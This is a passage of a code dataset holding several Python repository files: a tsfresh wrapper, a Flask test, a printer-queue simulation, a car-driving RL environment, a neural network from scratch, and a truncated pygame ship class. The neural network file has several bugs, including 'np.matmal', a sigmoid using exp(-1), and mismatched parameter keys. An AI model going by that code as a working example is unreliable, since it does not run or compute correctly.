If only one present, add a dummy column of 1's and pass the name here\n chunk_size: int\n Chunk size for distributing calculations to processes in multi processing\n default_fc_parameters: tsfresh.setting\n A dictionary setting parameters for features desired in Tsfresh feature calculator.\n Built in options include MinimalFCParameters(), EfficientFCParameters()\n \"\"\"\n self.column_id = column_id\n self.column_sort = column_sort\n self.chunk_size = chunk_size\n self.default_fc_parameters = default_fc_parameters\n self.n_jobs = n_jobs\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n feats = extract_features(\n X,\n column_id=self.column_id,\n column_sort=self.column_sort,\n chunksize=self.chunk_size,\n default_fc_parameters=self.default_fc_parameters,\n n_jobs=self.n_jobs,\n )\n\n # Rename columns to allow use with LightGBM, doesn't like \"-\", \".\"\n feats = feats.rename(\n columns=lambda x: re.sub(\"[^A-Za-z0-9_]+\", \"_\", x)\n )\n\n # Grab the datetime index out of tuple multi index that tsfresh uses\n return feats.set_index(feats.index.map(lambda x: x[1]), drop=True)\n\n\nclass SelectTSFeatures(BaseEstimator, TransformerMixin):\n \"\"\"\n Quick wrapper to allow for properly aligned time series X,y to use `tsfresh` feature augmentation.\n Expects Pandas DataFrames\n ASSUMES X,y sorted from oldest to newest already and aligned on index!\n \"\"\"\n\n def __init__(self, n_jobs):\n print(\" Selecting Relevant Features.....\")\n self.n_jobs = n_jobs\n return None\n\n def fit(self, X, y):\n self.selected_features = select_features(\n X, y, n_jobs=self.n_jobs\n ).columns\n print(\n f\"{len(self.selected_features)} features found significant out of {X.shape[1]} possible.\"\n )\n return self\n\n def transform(self, X, y=None):\n return X.loc[\n :, list(set(self.selected_features).intersection(set(X.columns)))\n ]\n\n\nclass RemoveNACols(BaseEstimator, TransformerMixin):\n \"\"\"\n Transformer to remove columns with NA's in X.\n \"\"\"\n\n def __init__(self):\n return None\n\n def fit(self, X, y=None):\n self.na_cols = X.isna().any()\n return self\n\n def transform(self, X, y=None):\n return X.loc[:, ~self.na_cols]\n\n\nclass RemoveZeroCols(BaseEstimator, TransformerMixin):\n \"\"\"\n Transformer to remove columns with all 0's in X.\n \"\"\"\n\n def __init__(self):\n return None\n\n def fit(self, X, y=None):\n self.non_zero_cols = (X != 0).any(axis=0)\n return self\n\n def transform(self, X, y=None):\n return X.loc[:, self.non_zero_cols]\n\n\ndef snapshot_model(model, path):\n now = datetime.now()\n date_time = now.strftime(\"%Y_%m_%d_%H_%M_%S\")\n dump(model, os.path.join(path, f\"{date_time}.joblib\"))","repo_name":"dbandrews/beach-time-series","sub_path":"utils/tsfresh_utils.py","file_name":"tsfresh_utils.py","file_ext":"py","file_size_in_byte":6434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38956659855","text":"from app.config import TestConfig\nfrom app import create_app\napp = create_app(TestConfig)\nimport unittest\n\n## some\n\nclass BasicTest(unittest.TestCase):\n\n\n def test_home_valid(self):\n tester = app.test_client(self)\n response = tester.get('/acceuil')\n self.assertEqual(response.status_code, 200)\n\nif __name__ == '__maim__':\n unittest.main()","repo_name":"swishswish123/PC_brevet","sub_path":"tests/test_home.py","file_name":"test_home.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"21809227896","text":"import random\nfrom pythonds.basic import Queue\n\n\nclass Printer:\n \"\"\"检查当前是否有待完成的任务。\"\"\"\n def __init__(self, ppm):\n # 其构造方法会初始化打印速度,即每分钟打印多少页。\n self.pagerate = ppm\n # 是否有待完成的任务\n self.currentTask = None\n # 工作所需的时间\n self.timeRemaining = 0\n\n def tick(self):\n \"\"\"\n tick方法会减量计时,并且在执行完任务之后将打印机设置成空闲状态\"\"\"\n if self.currentTask != None:\n # 打印机进行一秒的打印,同时从该任务的执行时间中减去一秒。\n self.timeRemaining = self.timeRemaining - 1\n # 如果打印任务执行完毕,或者说任务需要的时间减为0,则说明打印机回到空闲状态。\n if self.timeRemaining <= 0:\n self.currentTask = None\n\n def busy(self):\n \"\"\"如果有,那么打印机就处于工作状态\"\"\"\n if self.currentTask != None:\n return True\n else:\n return False\n\n def startNext(self, newtask):\n self.currentTask = newtask\n # 并且其工作所需的时间可以通过要打印的页数来计算。\n self.timeRemaining = newtask.getPages() * 60/self.pagerate\n\n\nclass Task:\n \"\"\"打印任务队列\"\"\"\n def __init__(self, time):\n # 每一个任务都需要保存一个时间戳,用于计算等待时间。\n # 这个时间戳代表任务被创建并放入打印任务队列的时间。\n self.timestamp = time\n # 当任务被创建时,随机数生成器会随机提供页数,取值范围是1~20。\n self.pages = random.randrange(1,21)\n\n def getStamp(self):\n return self.timestamp\n\n def getPages(self):\n return self.pages\n\n def waitTime(self, currenttime):\n \"\"\"waitTime方法可以获得任务在队列中等待的时间。\"\"\"\n return currenttime - self.timestamp\n\n\ndef newPrintTask():\n \"\"\"可以通过1~180的一个随机数来模拟每秒内产生打印任务的概率。\n 布尔辅助函数newPrintTask判断是否有新创建的打印任务。\n 我们再一次使用random模块中的randrange函数来生成随机数,不过这一次的取值范围是1~180。\n 平均每180秒有一个打印任务。\n 通过从随机数中选取180,可以模拟这个随机事件。\"\"\"\n num = random.randrange(1,181)\n if num == 180:\n return True\n else:\n return False\n\n\ndef simulation(numSeconds, pagesPerMinute):\n \"\"\"\n\n :param numSeconds: 总时间\n :param pagesPerMinute:打印机每分钟打印多少页\n :return:\n \"\"\"\n labprinter = Printer(pagesPerMinute)\n # printQueue对象是队列抽象数据类型的实例。\n # 创建一个打印任务队列。\n # 每一个任务到来时都会有一个时间戳。\n # 一开始,队列是空的。\n printQueue = Queue()\n # 存放任务的等待时间的一个列表\n waitingtimes = []\n # 针对每一秒(currentSecond),执行以下操作。\n for currentSecond in range(numSeconds):\n # 打印任务发生,就添加到打印任务队列\n # 是否有新创建的打印任务?\n # 如果是,以currentSecond作为其时间戳并将该任务加入到队列中。\n if newPrintTask():\n task = Task(currentSecond)\n printQueue.enqueue(task)\n # 打印机空闲,并且打印任务队列不为空\n # 如果打印机空闲,并且有正在等待执行的任务,执行以下操作:\n if (not labprinter.busy()) and (not printQueue.isEmpty()):\n # 取出打印任务\n # 从队列中取出第一个任务并提交给打印机;\n nexttask = printQueue.dequeue()\n # 计算等待时间:开始执行打印任务时间减去打印任务添加时间\n # 用currentSecond减去该任务的时间戳,以此计算其等待时间;\n # 将该任务的等待时间存入一个列表,以备后用;\n waitingtimes.append(nexttask.waitTime(currentSecond))\n # 计算打印时间\n # 根据该任务的页数,计算执行时间。\n labprinter.startNext(nexttask)\n # 打印机进行一秒的打印,同时从该任务的执行时间中减去一秒。\n labprinter.tick()\n # 当模拟完成之后,根据等待时间列表中的值计算平均等待时间。\n averageWait = sum(waitingtimes)/len(waitingtimes)\n print(\" Average Wait %6.2f secs %3d tasks remaining.\" % (averageWait, printQueue.size()))\n\n\nif __name__ == \"__main__\":\n for i in range(10):\n simulation(3600, 5)\n\n\n\n\n\n\n","repo_name":"weiguangfan/python_algorithm_application","sub_path":"python_ds/016.py","file_name":"016.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33066555033","text":"from gym_game.envs.world import World\n\nfrom gym_game.envs.agents import Car, RingBuilding, CircleBuilding, Painting, Pedestrian, Sensors, getEquidistantPoints, TextAgent, RectangleBuilding, CheckPointAgent\nfrom gym_game.envs.geometry import Point, Line\nfrom gym_game.envs.graphics import GraphWin\n\nimport time\nfrom tkinter import *\nimport numpy as np\nimport threading\n\nhuman_controller = False\n\ndt = 0.3 # time steps in terms of seconds. In other words, 1/dt is the FPS.\nworld_width = 120 # in meters\nworld_height = 120\ninner_building_radius = 25\nnum_lanes = 3\nlane_marker_width = 0.5\nnum_of_lane_markers = 20\nlane_width = 5\n\ncar_length = 4\ncar_width = 2\n\n\nspeed_limit = 5\nspeed_minimum = 1\n\ndef speed_state(car):\n if car.speed < speed_minimum:\n return 0\n elif car.speed > speed_limit:\n return 2\n else:\n return 1\n\ndef distance_state(car, checkpoint, init_dist):\n dist = car.distanceTo(checkpoint)\n for i in range(1, 5):\n if dist <= i*init_dist/5:\n return i\n return 1\n\ndistance_far = 5\ndistance_close = 1\n\ndef sensor_state_obstacle(sensor):\n if sensor.dist_obstacle < distance_close:\n return 0\n elif sensor.dist_obstacle > distance_far:\n return 2\n else:\n return 1\n\ndef sensor_state_painting(sensor):\n if sensor.closest_painting < distance_close:\n return 0\n elif sensor.closest_painting > distance_far:\n return 2\n else:\n return 1\n\nclass Carlo:\n def __init__(self, window_created: bool, win: GraphWin):\n\n self.window_created = window_created\n self.win = win\n self.w = World(dt, width = world_width, height = world_height, win = self.win, ppm = 6) # The world is 120 meters by 120 meters. ppm is the pixels per meter.\n\n # To create a circular road, we will add a CircleBuilding and then a RingBuilding around it\n # self.cb = CircleBuilding(Point(world_width/2, world_height/2), inner_building_radius, 'gray80')\n # self.w.add(self.cb)\n # self.rb = RingBuilding(Point(world_width/2, world_height/2), inner_building_radius + num_lanes * lane_width + (num_lanes - 1) * lane_marker_width, 1+np.sqrt((world_width/2)**2 + (world_height/2)**2), 'gray80')\n # self.w.add(self.rb)\n\n\n # Intersection map\n self.w.add(Painting(Point(71.5, 106.5), Point(97, 27), 'gray80')) # We build a sidewalk.\n self.w.add(RectangleBuilding(Point(72.5, 107.5), Point(95, 25))) # The RectangleBuilding is then on top of the sidewalk, with some margin.\n\n # Let's repeat this for 4 different RectangleBuildings.\n self.w.add(Painting(Point(8.5, 106.5), Point(17, 27), 'gray80'))\n self.w.add(RectangleBuilding(Point(7.5, 107.5), Point(15, 25)))\n\n self.w.add(Painting(Point(8.5, 41), Point(17, 82), 'gray80'))\n self.w.add(RectangleBuilding(Point(7.5, 40), Point(15, 80)))\n\n self.w.add(Painting(Point(71.5, 41), Point(97, 82), 'gray80'))\n self.w.add(RectangleBuilding(Point(72.5, 40), Point(95, 80)))\n\n # Let's also add some zebra crossings, because why not.\n self.w.add(Painting(Point(18, 81), Point(0.5, 2), 'white'))\n self.w.add(Painting(Point(19, 81), Point(0.5, 2), 'white'))\n self.w.add(Painting(Point(20, 81), Point(0.5, 2), 'white'))\n self.w.add(Painting(Point(21, 81), Point(0.5, 2), 'white'))\n self.w.add(Painting(Point(22, 81), Point(0.5, 2), 'white'))\n\n # Let's also add some lane markers on the ground. This is just decorative. 
Because, why not.\n # for lane_no in range(num_lanes - 1):\n # self.lane_markers_radius = inner_building_radius + (lane_no + 1) * lane_width + (lane_no + 0.5) * lane_marker_width\n # self.lane_marker_height = np.sqrt(2*(self.lane_markers_radius**2)*(1-np.cos((2*np.pi)/(2*num_of_lane_markers)))) # approximate the circle with a polygon and then use cosine theorem\n # for theta in np.arange(0, 2*np.pi, 2*np.pi / num_of_lane_markers):\n # self.dx = self.lane_markers_radius * np.cos(theta)\n # self.dy = self.lane_markers_radius * np.sin(theta)\n # self.w.add(Painting(Point(world_width/2 + self.dx, world_height/2 + self.dy), Point(lane_marker_width, self.lane_marker_height), 'white', heading = theta))\n\n\n # Checkpoint\n self.checkpoint = CheckPointAgent(Point(78, 85), 3)\n self.w.add(self.checkpoint)\n\n # A Car object is a dynamic object -- it can move. We construct it using its center location and heading angle.\n self.c1 = Car(Point(20, 20), np.pi/2)\n self.c1.max_speed = 30.0 # let's say the maximum is 30 m/s (108 km/h)\n self.c1.velocity = Point(0, 3.0)\n self.w.add(self.c1)\n self.ppm = 6\n\n self.c2 = Car(Point(118, 90), np.pi, 'blue')\n self.c2.velocity = Point(3.0, 0) # We can also specify an initial velocity just like this.\n self.w.add(self.c2)\n\n # Pedestrian is almost the same as Car. It is a \"circle\" object rather than a rectangle.\n self.p1 = Pedestrian(Point(28, 81), np.pi)\n self.p1.max_speed = 10.0 # We can specify min_speed and max_speed of a Pedestrian (and of a Car). This is 10 m/s, almost Usain Bolt.\n self.w.add(self.p1)\n\n \n # Sensors initialization\n self.range_sensors = 10 # 10 meters\n self.precision = 10 # sensors' resolution\n\n self.s1 = Sensors(\n Point(self.ppm*self.c1.center.x + self.c1.size.x/2 * np.cos(self.c1.heading) * self.ppm, self.ppm * world_height - self.ppm*self.c1.center.y - self.ppm * self.c1.size.x/2 * np.sin(self.c1.heading)), \n Point(self.ppm*self.c1.center.x + self.c1.size.x/2 * np.cos(self.c1.heading) * self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading), \n (self.ppm*world_height - self.ppm*self.c1.center.y - self.ppm * self.c1.size.x/2 * np.sin(self.c1.heading)) - self.ppm * self.range_sensors * np.sin(self.c1.heading)), \n self.range_sensors,\n \"Front_Sensor\",\n self.c1,\n self.precision)\n \n\n self.s2 = Sensors( \n Point(self.c1.corners[0].x*self.ppm, self.ppm*world_height - self.c1.corners[0].y*self.ppm), \n Point(self.c1.corners[0].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading + np.pi/4), \n (self.ppm*world_height - self.ppm*self.c1.corners[0].y) - self.ppm * self.range_sensors * np.sin(self.c1.heading + np.pi/4)), \n self.range_sensors,\n \"Diag_Left_Sensor\",\n self.c1,\n self.precision)\n\n self.s3 = Sensors(\n Point(self.c1.corners[3].x*self.ppm, self.ppm*world_height - self.c1.corners[3].y*self.ppm), \n Point(self.c1.corners[3].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading - np.pi/4), \n (self.ppm*world_height - self.ppm*self.c1.corners[3].y) - self.ppm * self.range_sensors * np.sin(self.c1.heading - np.pi/4)), \n self.range_sensors,\n \"Diag_Right_Sensor\",\n self.c1,\n self.precision)\n\n self.s4 = Sensors(\n Point(self.c1.edge_centers[1][0]*self.ppm, self.ppm*world_height - self.c1.edge_centers[1][1]*self.ppm), \n Point(self.c1.edge_centers[1][0]*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading + np.pi/2), \n (self.ppm*world_height - self.ppm*self.c1.edge_centers[1][1]) - self.ppm * self.range_sensors * np.sin(self.c1.heading + np.pi/2)), \n 
self.range_sensors,\n \"Mid_Left_Sensor\",\n self.c1,\n self.precision)\n\n self.s5 = Sensors(\n Point(self.c1.edge_centers[3][0]*self.ppm, self.ppm*world_height - self.c1.edge_centers[3][1]*self.ppm), \n Point(self.c1.edge_centers[3][0]*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading - np.pi/2), \n (self.ppm*world_height - self.ppm*self.c1.edge_centers[3][1]) - self.ppm * self.range_sensors * np.sin(self.c1.heading - np.pi/2)), \n self.range_sensors,\n \"Mid_Right_Sensor\",\n self.c1,\n self.precision)\n\n # self.s3 = Sensors(\n # Point(self.c1.corners[3].x*self.ppm, self.ppm*world_height - self.c1.corners[3].y*self.ppm), \n # Point(self.c1.corners[3].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading - np.pi/4), \n # (self.ppm*world_height - self.ppm*self.c1.corners[3].y) - self.ppm * self.range_sensors * np.sin(self.c1.heading - np.pi/4)), \n # self.range_sensors,\n # \"Mid_Right_Sensor\",\n # self.c1,\n # self.precision)\n\n self.s1.collidable = False\n self.s2.collidable = False\n self.s3.collidable = False\n self.s4.collidable = False\n self.s5.collidable = False\n\n self.w.add(self.s1)\n self.w.add(self.s2)\n self.w.add(self.s3)\n self.w.add(self.s4)\n self.w.add(self.s5)\n\n self.listSensors = [self.s1, self.s2, self.s3, self.s4, self.s5]\n\n # Add Text\n\n self.textTest = TextAgent(Point(world_width, world_height), \"Distance Front Sensor \" + str(self.s1.dist_obstacle) + \"\\n\" \n + \"Distance Diag Right Sensor \" + str(self.s3.dist_obstacle) + \"\\n\" \n + \"Distance Diag Left Sensor \" + str(self.s2.dist_obstacle) + \"\\n\"\n + \"Distance Mid Left Sensor \" + str(self.s4.dist_obstacle) + \"\\n\"\n + \"Distance Mid Right Sensor \" + str(self.s5.dist_obstacle))\n self.textTest.collidable = False\n self.w.add(self.textTest)\n\n self.init_dist_to_cp = self.c1.distanceTo(self.checkpoint)\n # self.w.render(window_created) # This visualizes the world we just constructed.\n \n\n\n # def observe(self):\n # #return state\n # return tuple([self.s1.dist_obstacle, self.s2.dist_obstacle, self.s3.dist_obstacle])\n\n # def action(self, action): # Right positive\n # if action == 0:\n # self.c1.set_control(0.5, 0)\n # elif action == 1:\n # self.c1.set_control(0, 0)\n # elif action == 2:\n # self.c1.set_control(-2, 0)\n\n # anchor = Point(world_width/5, world_height/5)\n # self.info = Text(anchor, str(self.c1.speed))\n # self.w.add(self.info)\n\n # self.w.render() # This visualizes the world we just constructed.\n\n\n def observe(self):\n #return state\n return tuple([sensor_state_obstacle(self.s1),\n sensor_state_obstacle(self.s2),\n sensor_state_obstacle(self.s3),\n sensor_state_obstacle(self.s4),\n sensor_state_obstacle(self.s5),\n sensor_state_painting(self.s1),\n sensor_state_painting(self.s2),\n sensor_state_painting(self.s3),\n sensor_state_painting(self.s4),\n sensor_state_painting(self.s5),\n speed_state(self.c1),\n distance_state(self.c1, self.checkpoint, self.init_dist_to_cp)\n ])\n\n def action(self, action):\n # if action == 0:\n # self.c1.set_control(0.3, 0)\n # elif action == 1:\n # self.c1.set_control(-0.3, 0)\n # elif action == 2:\n # self.c1.set_control(0, 1)\n # elif action == 3:\n # self.c1.set_control(0, -1)\n\n rotation = 0.15\n\n if action == 0:\n self.c1.set_control(rotation, 0.1)\n elif action == 1:\n self.c1.set_control(rotation, 1)\n elif action == 2:\n self.c1.set_control(rotation, -1)\n elif action == 3:\n self.c1.set_control(-rotation, 0.1)\n elif action == 4:\n self.c1.set_control(-rotation, 1)\n elif action == 5:\n 
self.c1.set_control(-rotation, -1)\n elif action == 6:\n self.c1.set_control(0, 0.1)\n elif action == 7:\n self.c1.set_control(0, 1)\n elif action == 8:\n self.c1.set_control(0, -1)\n\n\n\n self.w.tick() # This ticks the world for one time step (dt second)\n\n # Update sensors\n # First sensor\n self.s1.car = self.c1\n self.s1.p1 = Point(self.ppm*self.s1.car.center.x + self.s1.car.size.x/2 * np.cos(self.s1.car.heading) * self.ppm, self.ppm * world_height - self.ppm*self.s1.car.center.y - self.ppm * self.s1.car.size.x/2 * np.sin(self.s1.car.heading))\n self.s1.p2 = Point(self.ppm*self.s1.car.center.x + self.s1.car.size.x/2 * np.cos(self.s1.car.heading) * self.ppm + self.ppm * self.range_sensors * np.cos(self.s1.car.heading), \n (self.ppm*world_height - self.ppm*self.s1.car.center.y - self.ppm * self.s1.car.size.x/2 * np.sin(self.s1.car.heading)) - self.ppm * self.range_sensors * np.sin(self.s1.car.heading))\n self.s1.list_points = list(getEquidistantPoints(self.s1.p1, self.s1.p2, self.precision))\n\n # Second sensor\n self.s2.car = self.c1\n self.s2.p1 = Point(self.s2.car.corners[0].x*self.ppm, self.ppm*world_height - self.s2.car.corners[0].y*self.ppm)\n self.s2.p2 = Point(self.s2.car.corners[0].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.s2.car.heading + np.pi/4), \n (self.ppm*world_height - self.ppm*self.s2.car.corners[0].y) - self.ppm * self.range_sensors * np.sin(self.s2.car.heading + np.pi/4))\n self.s2.list_points = list(getEquidistantPoints(self.s2.p1, self.s2.p2, self.precision))\n # Third sensor\n self.s3.car = self.c1\n self.s3.p1 = Point(self.s3.car.corners[3].x*self.ppm, self.ppm*world_height - self.s3.car.corners[3].y*self.ppm)\n self.s3.p2 = Point(self.s3.car.corners[3].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.s1.car.heading - np.pi/4), \n (self.ppm*world_height - self.ppm*self.s3.car.corners[3].y) - self.ppm * self.range_sensors * np.sin(self.s3.car.heading - np.pi/4))\n self.s3.list_points = list(getEquidistantPoints(self.s3.p1, self.s3.p2, self.precision))\n # Fourth sensor\n self.s4.car = self.c1\n self.s4.p1 = Point(self.s4.car.edge_centers[1][0]*self.ppm, self.ppm*world_height - self.s4.car.edge_centers[1][1]*self.ppm)\n self.s4.p2 = Point(self.s4.car.edge_centers[1][0]*self.ppm + self.ppm * self.range_sensors * np.cos(self.s4.car.heading + np.pi/2), \n (self.ppm*world_height - self.ppm*self.s4.car.edge_centers[1][1]) - self.ppm * self.range_sensors * np.sin(self.s4.car.heading + np.pi/2))\n self.s4.list_points = list(getEquidistantPoints(self.s4.p1, self.s4.p2, self.precision))\n # Fifth sensor\n self.s5.car = self.c1\n self.s5.p1 = Point(self.s5.car.edge_centers[3][0]*self.ppm, self.ppm*world_height - self.s5.car.edge_centers[3][1]*self.ppm)\n self.s5.p2 = Point(self.s5.car.edge_centers[3][0]*self.ppm + self.ppm * self.range_sensors * np.cos(self.s5.car.heading - np.pi/2), \n (self.ppm*world_height - self.ppm*self.s5.car.edge_centers[3][1]) - self.ppm * self.range_sensors * np.sin(self.s5.car.heading - np.pi/2))\n self.s5.list_points = list(getEquidistantPoints(self.s5.p1, self.s5.p2, self.precision))\n\n # Update all sensors' lines\n for sensor in self.listSensors:\n sensor.obj = []\n for i in range(sensor.range_sensors):\n sensor.obj.append(Line(Point(sensor.list_points[i][0], sensor.list_points[i][1]), Point(sensor.list_points[i+1][0], sensor.list_points[i+1][1])))\n\n self.s1.collidable = False\n self.s2.collidable = False\n self.s3.collidable = False\n self.s4.collidable = False\n self.s5.collidable = False\n \n # Sensors detection 
parallelization\n threading.Thread(target = self.sensor_detection_obstacle).start()\n threading.Thread(target = self.sensor_detection_painting).start()\n\n\n # Update Text\n\n self.textTest.text = \"Distance Front Sensor \" + str(self.s1.dist_obstacle) + \"\\n\" \\\n + \"Distance Diag Right Sensor \" + str(self.s3.dist_obstacle) + \"\\n\" \\\n + \"Distance Diag Left Sensor \" + str(self.s2.dist_obstacle) + \"\\n\" \\\n + \"Distance Mid Left Sensor \" + str(self.s4.dist_obstacle) + \"\\n\" \\\n + \"Distance Mid Right Sensor \" + str(self.s5.dist_obstacle) + \"\\n\" \\\n \"\\n Speed \" + str(round(self.c1.speed, 3))\n\n self.textTest.collidable = False \n\n self.w.render(self.window_created)\n\n # time.sleep(dt/4) # Let's watch it 4x\n\n\n\n if self.w.collision_exists(): # We can check if there is any collision at all.\n pass\n # print('Collision exists somewhere...')\n\n if self.w.car_cross_line():\n pass\n # print(\"CAR CROSSES LINE\")\n\n def sensor_detection_obstacle(self):\n\n # Sensors detection\n for sensor in self.listSensors:\n sensor.dist_obstacle = self.range_sensors\n for agent in self.w.static_agents:\n if not isinstance(agent, Painting) and not isinstance(agent, TextAgent):\n for sensor in self.listSensors:\n for mRange in range(self.range_sensors):\n if (Line( sensor.obj[mRange].p1/self.ppm, sensor.obj[mRange].p2/self.ppm).intersectsWith(agent.obj)): \n # print(sensor.name, \" detects \", agent, \"range\", mRange)\n sensor.dist_obstacle = mRange\n break\n\n def sensor_detection_painting(self):\n for sensor in self.listSensors:\n sensor.closest_painting = self.range_sensors\n for agent in self.w.static_agents:\n if isinstance(agent, Painting):\n for sensor in self.listSensors:\n for mRange in range(self.range_sensors):\n if (Line( sensor.obj[mRange].p1/self.ppm, sensor.obj[mRange].p2/self.ppm).intersectsWith(agent.obj)):\n sensor.closest_painting = mRange\n # print(sensor.name, \"detects\", agent, \"range\", mRange)\n break\n\n def evaluate(self):\n\n reward = 0\n if self.w.collision_exists(): # We can check if there is any collision at all.\n reward += -10000\n else:\n reward += 100\n if self.c1.speed < speed_minimum or self.c1.speed > speed_limit:\n reward += -1000\n if self.c1.speed > 3:\n reward += 10\n if self.w.car_cross_line(): # car crosses line\n reward -= 100\n reward += -10*distance_state(self.c1, self.checkpoint, self.init_dist_to_cp)\n return reward\n\n def is_done(self):\n if self.w.collision_exists()or self.c1.center.x>120 or self.c1.center.y>120 or self.c1.center.y<0 or self.c1.center.x<0:\n self.w.erase_car()\n # self.carlo.w.visualizer.close()\n # self.w.visualizer.close()\n return True\n # if self.c1.speed == 0:\n # return True\n return False\n\n def view(self, window_created: bool):\n self.w.tick() # This ticks the world for one time step (dt second)\n self.w.render(window_created)\n # if self.w.collision_exists() or self.c1.center.x>120 or self.c1.center.y>120 or self.c1.center.y<0 or self.c1.center.x<0:\n #\n # self.w.erase_car()\n\n # time.sleep(dt/4) # Let's watch it 4x\n\n","repo_name":"ArwanC/Self-Driving-Car-DRL","sub_path":"self_driving_car/gym_game/envs/Carlo_intersect.py","file_name":"Carlo_intersect.py","file_ext":"py","file_size_in_byte":19455,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"71860975261","text":"import numpy as np \n\nclass NeuralNetwork:\n def __init__(self, sizes, activation=\"relu\"):\n self.sizes = sizes\n\n self.activation = self.relu if activation == \"relu\" else self.sigmoid\n \n # weights\n self.params = self.begin()\n # cache activations\n self.cache = {}\n\n def begin(self):\n input_layer = self.sizes[0]\n hidden_layer = self.sizes[1]\n output_layer = self.sizes[2]\n\n return {\n \"W1\": np.random.randn(hidden_layer, input_layer) * np.sqrt(1. / hidden_layer),\n \"B1\": np.random.randn(hidden_layer, 1) * np.sqrt(1. / hidden_layer),\n \"W2\": np.random.randn(output_layer, hidden_layer) * np.sqrt(1. / output_layer),\n \"B2\": np.random.randn(output_layer, 1) * np.sqrt(1. / output_layer)\n }\n \n def momentum_optimizer(self):\n return {\n \"W1\": np.zeros(self.params[\"W1\"].shape),\n \"B1\": np.zeros(self.params[\"B1\"].shape),\n \"W2\": np.zeros(self.params[\"W2\"].shape),\n \"B2\": np.zeros(self.params[\"B2\"].shape),\n }\n\n def sigmoid(self, x, derivative=False):\n if derivative: \n return (np.exp(-x))/((np.exp(-x)+1)**2)\n return 1/(1 + np.exp(-1))\n\n def relu(self, x, derivative=False):\n if derivative: \n x = np.where(x < 0, 0, x)\n x = np.where(x >= 0 , 1, x)\n return x\n return np.maximum(0, x)\n \n def softmax(self, x):\n return np.exp(x-x.max()) / np.sum(np.exp(x-x.max()), axis=0)\n \n def cross_entropy_loss(self,y,output):\n return -(1./y.shape[0]) * np.sum(np.multiply(y.T, np.log(output)))\n \n def forward(self, x):\n self.cache[\"X\"] = x\n self.cache[\"Z1\"] = np.matmul(self.params[\"W1\"], self.cache[\"X\"].T) + self.params[\"b1\"]\n self.cache[\"A1\"] = self.activation(self.cache[\"Z1\"])\n self.cache[\"Z2\"] = np.matmul(self.params[\"W2\"], self.cache[\"A1\"]) + self.params[\"b2\"]\n self.cache[\"A2\"] = self.softmax(self.cache[\"Z2\"])\n return self.cache[\"A2\"]\n \n def backward(self, y, output):\n batch_size = y.shape[0]\n\n dw2 = (1./batch_size) * np.matmal(output-y.T, self.cache[\"A1\"].T)\n db2 = (1./batch_size) * np.sum(output-y.T, axis=1, keepdims=True)\n\n d = np.matmal(self.params[\"W2\"].T, output-y.T) * self.activation(self.cache[\"Z1\"], derivative=True)\n dw1 = (1./batch_size) * np.matmul(d, self.cache[\"X\"])\n db1 = (1./batch_size) * np.sum(d, axis=1, keepdims=True)\n\n return {\n \"W1\": dw1,\n \"B1\": db1,\n \"W2\": dw2,\n \"B2\": db2\n }\n \n def accurancy(self, y, out):\n return np.mean(np.argmax(y, axis=0) == np.argmax(out, axis=0))\n \n\nnn = NeuralNetwork()","repo_name":"mustafaaljadery/deep-nn-scratch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14782009140","text":"\"\"\"Module containing ship classes\"\"\"\r\nimport pygame, time\r\nfrom random import randint\r\nfrom modules import sounds\r\nfrom modules import animation\r\npygame.init()\r\npygame.mixer.init(frequency=22050, size=-16, channels=2, buffer=4096)\r\n\r\nclass MainShip:\r\n \"\"\"Main class containing the base values & methods\"\"\"\r\n def __init__(self, name, x, y, color = 'red'):\r\n self.name = name\r\n self.x = x\r\n self.y = y\r\n self.size = 0\r\n self.health = 0\r\n self.move_ship = 0\r\n self.select = False\r\n self.direction = 0\r\n self.image = ''\r\n self.dead_image = ''\r\n self.attack_count = 0\r\n\r\n self.offensive_range = 0\r\n self.defensive_range = 0\r\n self.damage = 1\r\n self.vertical = True\r\n\r\n self.deactivate = False\r\n self.deactivate = True\r\n\r\n def set_select(self):\r\n if(self.select):\r\n self.select = False\r\n else:\r\n self.select = True\r\n\r\n def unset_select(self):\r\n self.select = False\r\n\r\n def get_select(self):\r\n return self.select\r\n\r\n def get_size(self):\r\n return self.size\r\n\r\n def get_deactivate(self):\r\n return self.deactivate\r\n\r\n def set_deactivate(self):\r\n self.deactivate = True\r\n\r\n def unset_deactivate(self):\r\n self.deactivate = False\r\n\r\n def get_deactivated(self):\r\n return self.deactivated\r\n\r\n def set_deactivated(self):\r\n self.deactivated = True\r\n\r\n def unset_deactivated(self):\r\n self.deactivated = False\r\n\r\n def canGoHere(self, pos, list_player1, list_player2):\r\n\r\n for ship in list_player1:\r\n if not ship == self:\r\n if self.vertical:\r\n if pos[0] == ship.x:\r\n if pos[1] >= ship.y - (self.get_size() - 1) and pos[1] <= ship.y + ship.size - 1:\r\n return False\r\n else:\r\n if pos[1] == ship.y:\r\n if pos[0] >= ship.x - (self.get_size() - 1) and pos[0] <= ship.x + ship.size - 1:\r\n print(\r\n \"Could not move ship {} (pos {} {}) because its colliding with ship {} (pos {} {})\".format(\r\n self.name, self.x, self.y, ship.name, ship.x, ship.y))\r\n return False\r\n\r\n for ship in list_player2:\r\n if not ship == self:\r\n if self.vertical:\r\n if pos[0] == ship.x:\r\n if pos[1] >= ship.y - (self.get_size() - 1) and pos[1] <= ship.y + ship.size - 1:\r\n return False\r\n else:\r\n if pos[1] == ship.y:\r\n if pos[0] >= ship.x - (self.get_size() - 1) and pos[0] <= ship.x + ship.size - 1:\r\n print(\r\n \"Could not move ship {} (pos {} {}) because its colliding with ship {} (pos {} 